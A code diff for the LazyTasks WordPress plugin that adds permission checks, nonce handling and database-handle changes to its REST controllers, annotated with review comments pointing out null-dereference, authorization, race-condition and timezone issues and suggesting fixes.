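Review bot: The new access check reads `$project['members']` before the existing `if ($project)` guard, so when `getProjectById` returns null for an unknown id PHP 8 emits an array-offset-on-null warning and the caller receives a 403 rather than the not-found handling below; move the null test ahead of the check, e.g. `if ( ! $project ) { return new WP_REST_Response( ['status' => 404, 'message' => 'No project found', 'data' => []], 200 ); }`, as the third copy of this logic already does. This block is also pasted three times in the file with small differences; a private helper that takes the request, the project array and the extra permissions and returns either null or a 403 `WP_REST_Response` would make the rule auditable in one place. `$getCurrentUser['data']['roles']` and `['llc_permissions']` are assumed to be present arrays; `in_array` should pass `true` as the third argument. The enclosing method starts and ends outside this hunk.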
@@ -1402,6 +1462,32 @@
$requestData = $request->get_params();
$project = $this->getProjectById($projectId);
+ $userController = new Lazytask_UserController();
+ $getCurrentUserResponse = $userController->lazytask_get_current_logged_user($request);
+ if (is_wp_error($getCurrentUserResponse)) {
+ return $getCurrentUserResponse;
+ }
+
+ $statusCode = $getCurrentUserResponse->get_status();
+ if($statusCode != 200){
+ return new WP_REST_Response(['status'=>$statusCode, 'message'=>'Unauthorized', 'data'=>[]], $statusCode);
+ }
+
+ $getCurrentUser = $getCurrentUserResponse->get_data();
+ $loggedInUserId = isset($getCurrentUser['data']['id']) ? $getCurrentUser['data']['id'] : null;
+
+ $isAdministrator = in_array('administrator', $getCurrentUser['data']['roles']);
+ $isAddMemberToProject = in_array('add-member-to-project-send-invite', $getCurrentUser['data']['llc_permissions']);
+
+ // Check if user is a member of the project
+ $isProjectMember = $project['members'] && sizeof($project['members']) > 0 && array_filter($project['members'], function($member) use ($loggedInUserId) {
+ return $member['id'] == $loggedInUserId;
+ });
+
+ if (!$isAdministrator && !$isAddMemberToProject && !$isProjectMember) {
+ return new WP_REST_Response(['status' => 403, 'message' => 'Forbidden: You do not have access to this project', 'data' => null], 403);
+ }
+
$returnArray = [];
if ($project){
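Review bot: This copy of the project-access check omits `manage-workspace-projects`, which the otherwise identical block earlier in the same file accepts, so a user with that permission can reach one endpoint but not this one; if the difference is deliberate add `// manage-workspace-projects intentionally not accepted here` and say why, otherwise align the two lists. As in the other copies, `$project['members']` is dereferenced before the `if ($project)` guard, so a missing project yields a PHP warning and a 403 instead of the not-found path. The enclosing method starts and ends outside this hunk.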
@@ -1448,6 +1534,33 @@
return new WP_REST_Response(['status' => 404, 'message' => 'No project found', 'data' => null], 200);
}
+ $userController = new Lazytask_UserController();
+ $getCurrentUserResponse = $userController->lazytask_get_current_logged_user($request);
+ if (is_wp_error($getCurrentUserResponse)) {
+ return $getCurrentUserResponse;
+ }
+
+ $statusCode = $getCurrentUserResponse->get_status();
+ if($statusCode != 200){
+ return new WP_REST_Response(['status'=>$statusCode, 'message'=>'Unauthorized', 'data'=>[]], $statusCode);
+ }
+
+ $getCurrentUser = $getCurrentUserResponse->get_data();
+ $loggedInUserId = isset($getCurrentUser['data']['id']) ? $getCurrentUser['data']['id'] : null;
+
+ $isAdministrator = in_array('administrator', $getCurrentUser['data']['roles']);
+ $isAddMemberToProject = in_array('add-member-to-project-send-invite', $getCurrentUser['data']['llc_permissions']);
+
+ // Check if user is a member of the project
+ $isProjectMember = $project['members'] && sizeof($project['members']) > 0 && array_filter($project['members'], function($member) use ($loggedInUserId) {
+ return $member['id'] == $loggedInUserId;
+ });
+
+ if (!$isAdministrator && !$isAddMemberToProject && !$isProjectMember) {
+ return new WP_REST_Response(['status' => 403, 'message' => 'Forbidden: You do not have access to this project', 'data' => []], 403);
+ }
+
+
$companyController = new Lazytask_CompanyController();
$company = $companyController->getCompanyById($project['company_id'], $request);
$project['parent'] = $company;
@@ -1484,7 +1597,7 @@
$limit = (int) $request->get_param('limit') ?: 10;
$offset = (int) $request->get_param('offset') ?: 0;
- // Step 1: Get section ID from slug
+ // phpcs:ignore WordPress.DB.DirectDatabaseQuery.DirectQuery, WordPress.DB.DirectDatabaseQuery.NoCaching
$section = $wpdb->get_row($wpdb->prepare(
"SELECT id FROM {$wpdb->prefix}pms_task_sections WHERE slug = %s AND project_id = %d",
$sectionSlug,
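Review bot: The replaced line dropped the explanatory comment `// Step 1: Get section ID from slug` in favour of the phpcs ignore; the two are not exclusive, and the step comment is what a reader needs. Keep both, with the phpcs directive on its own line directly above the query: `// Step 1: Get section ID from slug` followed by `// phpcs:ignore WordPress.DB.DirectDatabaseQuery.DirectQuery, WordPress.DB.DirectDatabaseQuery.NoCaching`. The same pattern applies to the later hunks in this file that replaced blank lines with the directive.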
@@ -1548,6 +1661,7 @@
'offset' => $offset
];
}else{
+ // phpcs:ignore WordPress.DB.DirectDatabaseQuery.DirectQuery, WordPress.DB.DirectDatabaseQuery.NoCaching
$priority = $wpdb->get_row($wpdb->prepare(
"SELECT id, name, color_code FROM {$wpdb->prefix}pms_project_priorities WHERE id = %d AND project_id = %d",
$priorityId,
@@ -1617,7 +1731,7 @@
'offset' => $offset
];
}else{
-
+ // phpcs:ignore WordPress.DB.DirectDatabaseQuery.DirectQuery, WordPress.DB.DirectDatabaseQuery.NoCaching
$status = $wpdb->get_row($wpdb->prepare(
"SELECT id, name, color_code, slug FROM {$wpdb->prefix}pms_project_statuses WHERE id = %d AND project_id = %d",
$statusId,
@@ -1683,7 +1797,7 @@
'offset' => $offset
];
}else{
-
+ // phpcs:ignore WordPress.DB.DirectDatabaseQuery.DirectQuery, WordPress.DB.DirectDatabaseQuery.NoCaching
$member = $wpdb->get_row($wpdb->prepare(
"SELECT id, display_name FROM {$wpdb->prefix}users WHERE id = %d",
$memberId
--- a/lazytasks-project-task-management/src/Controller/Lazytask_SettingController.php
+++ b/lazytasks-project-task-management/src/Controller/Lazytask_SettingController.php
@@ -13,7 +13,27 @@
public function get_settings(WP_REST_Request $request)
{
- $settings = get_option('lazytask_settings', []);
+ $userController = new Lazytask_UserController();
+ $permissionCheck = $userController->permission_check( $request, ['view-only-access', 'create-task', 'edit-task', 'general-settings'] );
+ if ( is_wp_error( $permissionCheck ) ) {
+ return $permissionCheck;
+ }
+
+ $getCurrentUserResponse = $userController->lazytask_get_current_logged_user($request);
+ if (is_wp_error($getCurrentUserResponse)) {
+ return $getCurrentUserResponse;
+ }
+
+ $statusCode = $getCurrentUserResponse->get_status();
+ if($statusCode != 200){
+ return new WP_REST_Response(['status'=>$statusCode, 'message'=>'Unauthorized', 'data'=>[]], $statusCode);
+ }
+
+ $getCurrentUser = $getCurrentUserResponse->get_data();
+ $settings = (object)[];
+ if( in_array('administrator', $getCurrentUser['data']['roles']) || in_array('general-settings', $getCurrentUser['data']['llc_permissions']) ) {
+ $settings = get_option('lazytask_settings', []);
+ }
//$currentTimezone = get_option('timezone_string', 'UTC');
$timezone_string = get_option('timezone_string');
$gmt_offset = get_option('gmt_offset');
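Review bot: For callers without `general-settings`, `$settings` is now `(object)[]` while the privileged path returns the array from `get_option('lazytask_settings', [])`; if the code below this hunk indexes `$settings['...']` or passes it to array functions, the stdClass value will raise a TypeError/fatal for exactly those users. Use `$settings = [];` for both branches and, if an empty JSON object is needed on the wire, convert at the point where the response is built, with a comment such as `// Non-admins receive an empty settings payload; only timezone data below is shared.` The double `permission_check` plus `lazytask_get_current_logged_user` round-trip also fetches the user twice, which a helper returning the user payload could avoid. The method continues outside this hunk.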
@@ -102,7 +122,11 @@
public function update_settings(WP_REST_Request $request)
{
-
+ $userController = new Lazytask_UserController();
+ $permissionCheck = $userController->permission_check( $request, ['general-settings'] );
+ if ( is_wp_error( $permissionCheck ) ) {
+ return $permissionCheck;
+ }
$requestData = $request->get_body_params();
$settings = isset($requestData['settings']) ? json_decode($requestData['settings'], true) : [];
@@ -167,10 +191,11 @@
]);
}else{
global $wpdb;
+ $db = Lazytask_DatabaseTableSchema::get_global_wp_db($wpdb);
$table_name = LAZYTASK_TABLE_PREFIX . 'tasks';
// Get all tasks with null serial_no ordered by ID
- $tasks = $wpdb->get_results(
+ $tasks = $db->get_results(
"SELECT id FROM {$table_name}
WHERE deleted_at IS NULL
ORDER BY id ASC"
@@ -199,7 +224,7 @@
WHERE id IN ($ids_list)
";
- $result = $wpdb->query($sql);
+ $result = $db->query($sql);
}
}
@@ -233,8 +258,13 @@
}
+ $errorMessage = '';
update_option('lazytask_settings', $settings);
- Lazytask_Helper_QR_Code::lazytask_preview_app_qrcode_generator();
+ if(extension_loaded('gd') && extension_loaded('mbstring')){
+ Lazytask_Helper_QR_Code::lazytask_preview_app_qrcode_generator();
+ }else{
+ $errorMessage = 'But QR Code generation failed: Required GD or MBString extension is not enabled.';
+ }
$getSettings = get_option('lazytask_settings', []);
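Review bot: When GD or mbstring is missing the handler still answers 200 with a message that now reads `Settings update successfully. But QR Code generation failed: ...` (L813 combined with L820), and when both extensions are present the concatenation at L820 leaves a trailing space. Expose the condition as structured data rather than prose: keep `'message' => 'Settings update successfully.'` and add `'warning' => $errorMessage,` so the client decides how to present it, or at minimum `rtrim()` the combined string. The new text is also the only response message here not wrapped in `__()` with the `lazytasks-project-task-management` domain used elsewhere in the plugin (L1245), so `$errorMessage = __( 'QR code was not generated: the GD or mbstring PHP extension is not enabled.', 'lazytasks-project-task-management' );` would keep it translatable.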
@@ -244,7 +274,7 @@
return new WP_REST_Response([
'status'=>200,
- 'message'=>'Settings update successfully',
+ 'message'=>'Settings update successfully.'.' '.$errorMessage,
'data'=>$getSettings,
'requestData'=>$settings,
'currentTimezone'=>$current_timezone,
@@ -252,9 +282,14 @@
], 200);
}
- public function getLazytaskConfig()
+ public function getLazytaskConfig( WP_REST_Request $request )
{
-
+ //permission check
+ $userController = new Lazytask_UserController();
+ $permissionCheck = $userController->permission_check( $request, ['general-settings'] );
+ if ( is_wp_error( $permissionCheck ) ) {
+ return $permissionCheck;
+ }
$getLazytasksConfig = get_option('lazytasks_config');
$lazytask_do_activation_redirect = get_option('lazytask_do_activation_redirect');
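Review bot: `getLazytaskConfig()` gains a required `WP_REST_Request $request` parameter at L828; any remaining internal call of the form `$this->getLazytaskConfig()` (none is visible in this diff, so this is a grep request) now throws an `ArgumentCountError` at runtime. Please confirm the method is reached only as a REST callback, and add a short PHPDoc, `/** @return WP_REST_Response|WP_Error the stored lazytasks_config, or a WP_Error when the caller lacks general-settings */`, so the new contract is explicit.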
@@ -289,6 +324,12 @@
public function updateLazytaskConfig( WP_REST_Request $request )
{
+ //permission check
+ $userController = new Lazytask_UserController();
+ $permissionCheck = $userController->permission_check( $request, ['general-settings'] );
+ if ( is_wp_error( $permissionCheck ) ) {
+ return $permissionCheck;
+ }
$requestData = $request->get_json_params();
@@ -390,6 +431,11 @@
public function update_portal_settings(WP_REST_Request $request)
{
+ $userController = new Lazytask_UserController();
+ $permissionCheck = $userController->permission_check( $request, ['general-settings'] );
+ if ( is_wp_error( $permissionCheck ) ) {
+ return $permissionCheck;
+ }
$data = $request->get_json_params();
$lazytask_page_id = get_option('lazytask_page_id');
@@ -417,7 +463,6 @@
$updated_post = wp_update_post($post_data, true);
if (is_wp_error($updated_post)) {
- error_log('Post Update Error: ' . $updated_post->get_error_message());
return new WP_Error('update_failed', $updated_post->get_error_message(), ['status' => 500]);
}
@@ -484,6 +529,11 @@
public function editLicenseModalStatus(WP_REST_Request $request)
{
+ $userController = new Lazytask_UserController();
+ $permissionCheck = $userController->permission_check( $request, ['view-only-access'] );
+ if ( is_wp_error( $permissionCheck ) ) {
+ return $permissionCheck;
+ }
$user_id = $request->get_param('user_id');
if (!$user_id) {
return new WP_Error('invalid_user', 'User ID is required', ['status' => 400]);
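Review bot: The handler authorises on `view-only-access` (L869) but then acts on whatever `user_id` the client supplies (L873), so, if the body past this hunk writes per-user state as the name suggests, any authenticated user holding the lowest permission can target another account's license-modal flag. Compare the supplied id with the authenticated user, which `lazytask_get_current_logged_user()` already exposes, and allow a mismatch only for callers with `manage-users`, e.g. `if ( (int) $user_id !== (int) $current['data']['id'] && ! in_array( 'manage-users', $current['data']['llc_permissions'], true ) ) { return new WP_Error( 'rest_forbidden', 'Cannot modify another user', ['status' => 403] ); }`. The rest of `editLicenseModalStatus` is outside the hunk, so this is inferred from the parameter name.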
@@ -502,7 +552,13 @@
}
public function installActivateAddon(WP_REST_Request $request)
- {
+ {
+ $userController = new Lazytask_UserController();
+ $permissionCheck = $userController->permission_check( $request, ['addon-install'] );
+ if ( is_wp_error( $permissionCheck ) ) {
+ return $permissionCheck;
+ }
+
$requestData = $request->get_json_params();
$addon = isset($requestData['addon']) ? sanitize_text_field($requestData['addon']) : '';
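Review bot: Installing and activating a plugin package is gated only on the plugin-level `addon-install` permission (L882); WordPress itself guards the same operation with the `install_plugins` and `activate_plugins` capabilities and the `DISALLOW_FILE_MODS` constant, so a LazyTasks role could grant plugin installation to accounts that core would refuse. Provided the JWT flow sets the current user before this point (not visible here), add `if ( ! current_user_can( 'install_plugins' ) ) { return new WP_Error( 'rest_forbidden', 'Insufficient capability to install plugins', ['status' => 403] ); }` after the permission check, and the `activate_plugins` equivalent in `toggleAddonStatus` at L895-L904. A PHPDoc line stating that this endpoint writes to the filesystem would also help reviewers of the route table.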
@@ -572,7 +628,6 @@
// Download URL
$addon_zip_url = esc_url_raw($data['download_url']);
- error_log('Addon Zip URL: ' . $addon_zip_url); // --- IGNORE ---
// Load required WordPress classes
require_once ABSPATH . 'wp-admin/includes/class-wp-upgrader.php';
@@ -614,6 +669,11 @@
public function toggleAddonStatus(WP_REST_Request $request)
{
+ $userController = new Lazytask_UserController();
+ $permissionCheck = $userController->permission_check( $request, ['addon-install'] );
+ if ( is_wp_error( $permissionCheck ) ) {
+ return $permissionCheck;
+ }
$requestData = $request->get_json_params();
$addon = isset($requestData['addon']) ? sanitize_text_field($requestData['addon']) : '';
@@ -666,6 +726,11 @@
public function updateSocialLoginSettings(WP_REST_Request $request)
{
+ $userController = new Lazytask_UserController();
+ $permissionCheck = $userController->permission_check( $request, ['general-settings'] );
+ if ( is_wp_error( $permissionCheck ) ) {
+ return $permissionCheck;
+ }
$requestData = $request->get_json_params();
$social_login_settings = isset($requestData['social_login_settings']) ?
(array)$requestData['social_login_settings'] : [];
--- a/lazytasks-project-task-management/src/Controller/Lazytask_TaskController.php
+++ b/lazytasks-project-task-management/src/Controller/Lazytask_TaskController.php
@@ -82,10 +82,10 @@
$isSerialEnabled = isset($taskSerialSettings['enabled']) ? $taskSerialSettings['enabled'] : false;
$serialStartNumber = isset($taskSerialSettings['number']) ? $taskSerialSettings['number'] : 1;
- $lastSerial = $wpdb->get_var("SELECT MAX(serial_no) FROM " . self::TABLE_TASKS);
+ $lastSerial = $db->get_var("SELECT MAX(serial_no) FROM " . self::TABLE_TASKS);
if($parent){
- $lastSubSerial = $wpdb->get_var(
- $wpdb->prepare(
+ $lastSubSerial = $db->get_var(
+ $db->prepare(
"SELECT MAX(serial_no) FROM " . self::TABLE_TASKS . " WHERE parent_id = %d",
$parent
)
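Review bot: `$lastSerial` is read with `SELECT MAX(serial_no)` (L922, L926-L930) and, judging by the sibling hunks, incremented for the following INSERT; two concurrent task creations can read the same maximum and write duplicate serial numbers, and moving the call from `$wpdb` to `$db` does not change that. The same read-then-increment appears at L989-L991, L1008-L1010, L1016-L1018, L1039-L1041 and L1047-L1048. If `serial_no` is meant to be unique, a UNIQUE index with a retry on duplicate-key error, or a dedicated counter row updated atomically, is needed; the function that defines `$db` starts outside this hunk, so its scope could not be checked here.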
@@ -131,30 +131,32 @@
$taskId = $wpdb->insert_id;
$mention_users = isset($requestData['mention_users']) && sizeof($requestData['mention_users']) > 0 ? $requestData['mention_users'] : [];
- $loggedInUser = get_user_by('ID', $createdBy);
- foreach($mention_users as $mentioned_user){
- // Prepare data for notification
- $referenceInfo = [
- 'id' => $id,
- 'name' => $name,
- 'type' => 'mention'
- ];
-
- $placeholdersArray = [
- 'member_name' => $mentioned_user['name'],
- 'task_name' => $name,
- 'project_name' => '',
- 'creator_name' => $loggedInUser ? $loggedInUser->display_name : '',
- 'description' => $description
- ];
- // Trigger notification action
- do_action(
- 'lazytask_task_member_mention',
- $referenceInfo,
- ['web-app'],
- [$mentioned_user['id']],
- $placeholdersArray
- );
+ $loggedInUser = get_user_by('ID', $createdBy);
+ if ( sizeof( $mention_users ) > 0 ){
+ foreach($mention_users as $mentioned_user){
+ // Prepare data for notification
+ $referenceInfo = [
+ 'id' => $taskId,
+ 'name' => $name,
+ 'type' => 'mention'
+ ];
+
+ $placeholdersArray = [
+ 'member_name' => $mentioned_user['name'],
+ 'task_name' => $name,
+ 'project_name' => '',
+ 'creator_name' => $loggedInUser ? $loggedInUser->display_name : '',
+ 'description' => $description
+ ];
+ // Trigger notification action
+ do_action(
+ 'lazytask_task_member_mention',
+ $referenceInfo,
+ ['web-app'],
+ [$mentioned_user['id']],
+ $placeholdersArray
+ );
+ }
}
// Insert the task members into the database
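Review bot: `$taskId = $wpdb->insert_id` (L932) is still read from the global `$wpdb` while the surrounding queries were moved to `$db` (L922-L930, and presumably the INSERT just above this hunk); if `Lazytask_DatabaseTableSchema::get_global_wp_db()` returns anything other than the same `wpdb` instance, `insert_id` belongs to a different connection and the notification carries the wrong id — the very field this hunk fixes by changing `'id' => $id` to `'id' => $taskId`. Read it from the same handle, `$taskId = $db->insert_id;`, or confirm in `get_global_wp_db()` that it returns `$wpdb` itself. The added `if ( sizeof( $mention_users ) > 0 )` at L959 is redundant: `$mention_users` is normalised to `[]` on L933 and `foreach` over an empty array is a no-op.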
@@ -3308,7 +3310,7 @@
$updated_by = isset($requestData['updated_by']) && $requestData['updated_by'] != "" ? (int)$requestData['updated_by'] : null;
$taskTable = LAZYTASK_TABLE_PREFIX . 'tasks';
- $lastSerial = $wpdb->get_var("SELECT MAX(serial_no) FROM " . $taskTable);
+ $lastSerial = $db->get_var("SELECT MAX(serial_no) FROM " . $taskTable);
$newSerial = $lastSerial + 1 ;
$subtask = $db->get_row($db->prepare("SELECT * FROM {$taskTable} WHERE id = %d",$id));
@@ -3436,10 +3438,10 @@
// $copiedName = $task['name'] . ' (Copy)';
$baseName = $task['name'];
- $likePattern = $wpdb->esc_like($baseName . ' (Copy') . '%';
+ $likePattern = $db->esc_like($baseName . ' (Copy') . '%';
- $existingNames = $wpdb->get_col(
- $wpdb->prepare(
+ $existingNames = $db->get_col(
+ $db->prepare(
"SELECT name FROM {$wpdb->prefix}pms_tasks WHERE name LIKE %s AND project_id = %d",
$likePattern,
$task['project_id']
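Review bot: The duplicate-name lookup at L1002 queries `{$wpdb->prefix}pms_tasks` while every other task query in this file goes through `self::TABLE_TASKS` (L922, L1009) or `LAZYTASK_TABLE_PREFIX . 'tasks'` (L988); if the two names ever differ, the `(Copy` counter reads the wrong table and the copied task silently gets a colliding name. Use `"SELECT name FROM " . self::TABLE_TASKS . " WHERE name LIKE %s AND project_id = %d"` so the table is named consistently, after which `$wpdb` is no longer referenced in this block.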
@@ -3468,7 +3470,7 @@
// Get new sort order
$sortOrder = $this->getMaxSortOrderBySectionId($task['task_section_id'], $task['project_id'], $task['parent_id']);
- $lastSerial = $wpdb->get_var("SELECT MAX(serial_no) FROM " . self::TABLE_TASKS);
+ $lastSerial = $db->get_var("SELECT MAX(serial_no) FROM " . self::TABLE_TASKS);
$newSerial = ($task['parent_id'] ? null : ($lastSerial ? $lastSerial + 1 : 1));
// Insert copied task
@@ -3554,7 +3556,7 @@
$copiedSubtaskName = $subtask['name'] . ' (Copy)';
$copiedSubtaskSlug = Lazytask_SlugGenerator::slug($copiedSubtaskName, self::TABLE_TASKS, 'slug');
$subtaskSortOrder = $this->getMaxSortOrderBySectionId($subtask['section_id'], $subtask['project_id'], $newTaskId);
- $lastSerial = $wpdb->get_var("SELECT MAX(serial_no) FROM " . self::TABLE_TASKS);
+ $lastSerial = $db->get_var("SELECT MAX(serial_no) FROM " . self::TABLE_TASKS);
$newSerial = ($lastSerial ? $lastSerial + 1 : 1);
// Insert copied subtask
@@ -3727,7 +3729,7 @@
// Prepare and insert new section
$tableTaskSection = LAZYTASK_TABLE_PREFIX . 'task_sections';
- $lastSerial = $wpdb->get_var($wpdb->prepare(
+ $lastSerial = $db->get_var($db->prepare(
"SELECT MAX(sort_order) FROM {$tableTaskSection} WHERE project_id = %d",
$taskSection['project_id']
));
@@ -3765,7 +3767,7 @@
];
// Get and duplicate tasks in the original section
- $originalTasks = $db->get_results($wpdb->prepare(
+ $originalTasks = $db->get_results($db->prepare(
"SELECT * FROM " . self::TABLE_TASKS . " WHERE section_id = %d AND parent_id IS NULL",
$id
), ARRAY_A);
@@ -3808,7 +3810,7 @@
$db->query('START TRANSACTION');
$sortOrder = $this->getMaxSortOrderBySectionId($sectionId, $task['project_id'], null);
- $lastSerial = $wpdb->get_var("SELECT MAX(serial_no) FROM " . self::TABLE_TASKS);
+ $lastSerial = $db->get_var("SELECT MAX(serial_no) FROM " . self::TABLE_TASKS);
$newSerial = $lastSerial ? $lastSerial + 1 : 1;
$newTaskData = [
@@ -3885,7 +3887,7 @@
foreach ($subtasks as $subtask) {
$subSlug = Lazytask_SlugGenerator::slug($subtask['name'] . ' (Copy)', self::TABLE_TASKS, 'slug');
$subSortOrder = $this->getMaxSortOrderBySectionId($subtask['section_id'], $subtask['project_id'], $newTaskId);
- $newSubSerial = $wpdb->get_var("SELECT MAX(serial_no) FROM " . self::TABLE_TASKS) + 1;
+ $newSubSerial = $db->get_var("SELECT MAX(serial_no) FROM " . self::TABLE_TASKS) + 1;
$subtaskData = [
"serial_no" => $newSubSerial,
@@ -4529,8 +4531,8 @@
$returnArray = [];
if (!empty($allResults)) {
foreach ($allResults as $row) {
- $created_at_formatted = $row['created_at'] ? date('d F Y H:i', strtotime($row['created_at'])) : null;
- $updated_at_formatted = $row['updated_at'] ? date('d F Y H:i', strtotime($row['updated_at'])) : null;
+ $created_at_formatted = $row['created_at'] ? gmdate('d F Y H:i', strtotime($row['created_at'])) : null;
+ $updated_at_formatted = $row['updated_at'] ? gmdate('d F Y H:i', strtotime($row['updated_at'])) : null;
$returnArray[] = [
'id' => $row['id'],
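Review bot: Switching `date()` to `gmdate()` at L1057-L1058 pins the formatted `created_at`/`updated_at` to UTC; these `d F Y H:i` strings look user-facing, and WordPress's `wp_date()` (or `get_date_from_gmt()` when the stored values are UTC) renders in the site's configured timezone, which the `timezone_string`/`gmt_offset` reads at L773-L774 suggest the plugin cares about. `wp_date( 'd F Y H:i', strtotime( $row['created_at'] ) )` is a drop-in here. Whether the column values are stored as UTC or site-local is not visible in the hunk, so please confirm before choosing.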
@@ -5399,7 +5401,7 @@
$projectsData[] = [
'project_id' => (int)$proj->project_id,
'project_name' => $proj->project_name,
- 'color' => $colorPalette[$i] ?? sprintf("#%06X", mt_rand(0, 0xFFFFFF)),
+ 'color' => $colorPalette[$i] ?? sprintf("#%06X", wp_rand(0, 0xFFFFFF)),
// Absolute numbers
'total_tasks' => (int)$proj->total_tasks,
@@ -6144,10 +6146,10 @@
$defaultDuration = 1;
$isMissing = empty($start_date) || empty($end_date);
- $stDate = empty($start_date) && !empty($end_date) && date('Y-m-d', strtotime( $end_date ) ) < date('Y-m-d') ? date('Y-m-d', strtotime( $end_date ) ): date('Y-m-d');
+ $stDate = empty($start_date) && !empty($end_date) && gmdate('Y-m-d', strtotime( $end_date ) ) < gmdate('Y-m-d') ? gmdate('Y-m-d', strtotime( $end_date ) ): gmdate('Y-m-d');
- $startDate = !empty($start_date) ? date('Y-m-d H:i', strtotime( $start_date. ' 00:00' ) ) : date('Y-m-d H:i', strtotime( $stDate . ' 00:00' ) );
- $endDate = !empty($end_date) ? date('Y-m-d H:i', strtotime( $end_date. ' 23:59' ) ) : date('Y-m-d H:i', strtotime( $today->format('Y-m-d') . ' 23:59' ) );
+ $startDate = !empty($start_date) ? gmdate('Y-m-d H:i', strtotime( $start_date. ' 00:00' ) ) : gmdate('Y-m-d H:i', strtotime( $stDate . ' 00:00' ) );
+ $endDate = !empty($end_date) ? gmdate('Y-m-d H:i', strtotime( $end_date. ' 23:59' ) ) : gmdate('Y-m-d H:i', strtotime( $today->format('Y-m-d') . ' 23:59' ) );
/*if ($startDate && $endDate && $startDate == $endDate) {
// If start and end date are the same, set the end date to one day later
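Review bot: The fallbacks at L1073-L1077 now derive "today" from `gmdate('Y-m-d')` (UTC) while the `$endDate` fallback uses `$today->format('Y-m-d')`, an object whose timezone is set outside the hunk; around midnight on a non-UTC site the two can name different days, producing a start after the end. Derive both from one source, e.g. `$todayYmd = $today->format('Y-m-d');` and use `$todayYmd` in place of each `gmdate('Y-m-d')` at L1073 and L1076. The `<` at L1073 compares `Y-m-d` strings lexicographically, which is only correct because the format is zero-padded ISO order; a one-line comment saying so would spare the next reader the check.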
--- a/lazytasks-project-task-management/src/Controller/Lazytask_UserController.php
+++ b/lazytasks-project-task-management/src/Controller/Lazytask_UserController.php
@@ -392,6 +392,7 @@
'llc_permissions' => isset($roles['permissions']) && sizeof($roles['permissions'])>0 ? array_unique($this->array_flatten( $roles['permissions'])) : [],
),
);
+
//add user meta data for apps development fcm token after login
$lazytask_fcm_token = $request->get_param('lazytask_fcm_token');
if($lazytask_fcm_token != ''){
@@ -402,9 +403,11 @@
$this->update_user_status($user->ID, 1);
}
+ $nonce = wp_create_nonce('wp_rest');
+
$token = JWT::encode($token, $secret_key, 'HS256');
- return new WP_REST_Response(array( 'status'=> 200, 'code'=>'is_valid', 'message'=> 'Success', 'token' => $token));
+ return new WP_REST_Response(array( 'status'=> 200, 'code'=>'is_valid', 'message'=> 'Success', 'token' => $token, 'nonce' => $nonce));
}
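Review bot: The nonce returned from the login endpoints (L1093, L1103, L1152) is minted by `wp_create_nonce('wp_rest')`, whose value is derived from the current user id and session token at the time of the call; in a token-based REST login there is normally no cookie session, so the nonce is minted for user 0, and the check added in `validate_token` at L1112-L1115 succeeds only while `wp_verify_nonce()` runs in that same user-0 context — once a request is cookie-authenticated as a real user, the same nonce fails. WordPress nonces also expire after 12–24 hours regardless of the JWT's lifetime, so pure token clients (the `lazytask_fcm_token` flow at L1088) will start receiving `invalid_nonce` 403s until they log in again. Bearer-token requests are not exposed to the cookie-CSRF that the `wp_rest` nonce exists to prevent, so if I read the intent correctly the check belongs only on cookie-authenticated requests, e.g. `if ( is_user_logged_in() && ( ! $nonce || ! wp_verify_nonce( $nonce, 'wp_rest' ) ) )`, and the login response should document the nonce's lifetime. The enclosing `validate_token` starts outside that hunk, so how the current user is set before the check could not be verified.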
private function update_user_status($user_id, $status)
@@ -507,9 +510,10 @@
$this->update_user_status($user->ID, 1);
}
+ $nonce = wp_create_nonce('wp_rest');
$token = JWT::encode($token, $secret_key, 'HS256');
- return new WP_REST_Response(array( 'status'=> 200, 'code'=>'is_valid', 'message'=> 'Success', 'token' => $token));
+ return new WP_REST_Response(array( 'status'=> 200, 'code'=>'is_valid', 'message'=> 'Success', 'token' => $token, 'nonce' => $nonce));
}
// Function to generate JWT token
@@ -527,6 +531,11 @@
);
}
+ $nonce = $request->get_header('X-WP-Nonce');
+ if (!$nonce || !wp_verify_nonce($nonce, 'wp_rest')) {
+ return new WP_Error('invalid_nonce', 'Nonce verification failed', ['status' => 403]);
+ }
+
/*
* Extract the authorization header
*/
@@ -730,6 +739,7 @@
delete_user_meta($user_id, 'lazytask_fcm_token');
wp_clear_auth_cookie();
+ wp_set_current_user(0);
return new WP_REST_Response([
'status' => 200,
@@ -850,6 +860,24 @@
return true;
}
+ //get current logged in user information by JWT token
+ public function lazytask_get_current_logged_user(WP_REST_Request $request)
+ {
+ $response = $this->validate_token($request);
+ if (is_wp_error($response)) {
+ return $response;
+ }
+ $user_id = $response['data']['token']->data->user_id;
+ $user = $this->getUserById($user_id);
+
+ if($user && sizeof($user)>0){
+ return new WP_REST_Response(['status'=>200, 'data'=>$user]);
+ }
+
+ return new WP_REST_Response(['status'=>404, 'data'=>[]]);
+ }
+
+
public function admin_after_auth_login () {
$secret_key = defined( 'LAZYTASK_JWT_SECRET_KEY' ) ? LAZYTASK_JWT_SECRET_KEY : false;
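Review bot: The new `lazytask_get_current_logged_user()` (L1130-L1144) has no docblock and dereferences `$response['data']['token']->data->user_id` at L1136 without checking the shape; if `validate_token()` ever returns a success payload without that path, this becomes a fatal "property on null". Guard it, `$user_id = $response['data']['token']->data->user_id ?? null; if ( ! $user_id ) { return new WP_Error( 'invalid_token', 'Token payload has no user id', ['status' => 401] ); }`, and add a docblock stating that it returns `WP_Error` for an invalid token, a 200 `WP_REST_Response` wrapping the `getUserById()` array otherwise, and 404 when no user matches — the callers at L757-L765 and L1222-L1230 branch on exactly that contract, so it is worth writing down.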
@@ -884,9 +912,11 @@
),
);
+ $nonce = wp_create_nonce('wp_rest');
+
$token = JWT::encode($token, $secret_key, 'HS256');
- return new WP_REST_Response(array('token' => $token, 'user'=>$user));
+ return new WP_REST_Response(array('token' => $token, 'user'=>$user, 'nonce' => $nonce), 200);
}
private function array_unique_by_key(array $array, string $key): array {
@@ -901,6 +931,10 @@
}
public function createLazyLinkRole(WP_REST_Request $request) {
+ $permissionCheck = $this->permission_check( $request, ['manage-rolls-permissions'] );
+ if ( is_wp_error( $permissionCheck ) ) {
+ return $permissionCheck;
+ }
global $wpdb;
$db = Lazytask_DatabaseTableSchema::get_global_wp_db($wpdb);
$rolesTable = LAZYTASK_TABLE_PREFIX . 'roles';
@@ -953,6 +987,11 @@
public function updateLazyLinkRole(WP_REST_Request $request)
{
+ $permissionCheck = $this->permission_check( $request, ['manage-rolls-permissions'] );
+ if ( is_wp_error( $permissionCheck ) ) {
+ return $permissionCheck;
+ }
+
global $wpdb;
$db = Lazytask_DatabaseTableSchema::get_global_wp_db($wpdb);
$rolesTable = LAZYTASK_TABLE_PREFIX . 'roles';
@@ -1002,6 +1041,10 @@
public function deleteLazyLinkRole(WP_REST_Request $request)
{
+ $permissionCheck = $this->permission_check( $request, ['manage-rolls-permissions'] );
+ if ( is_wp_error( $permissionCheck ) ) {
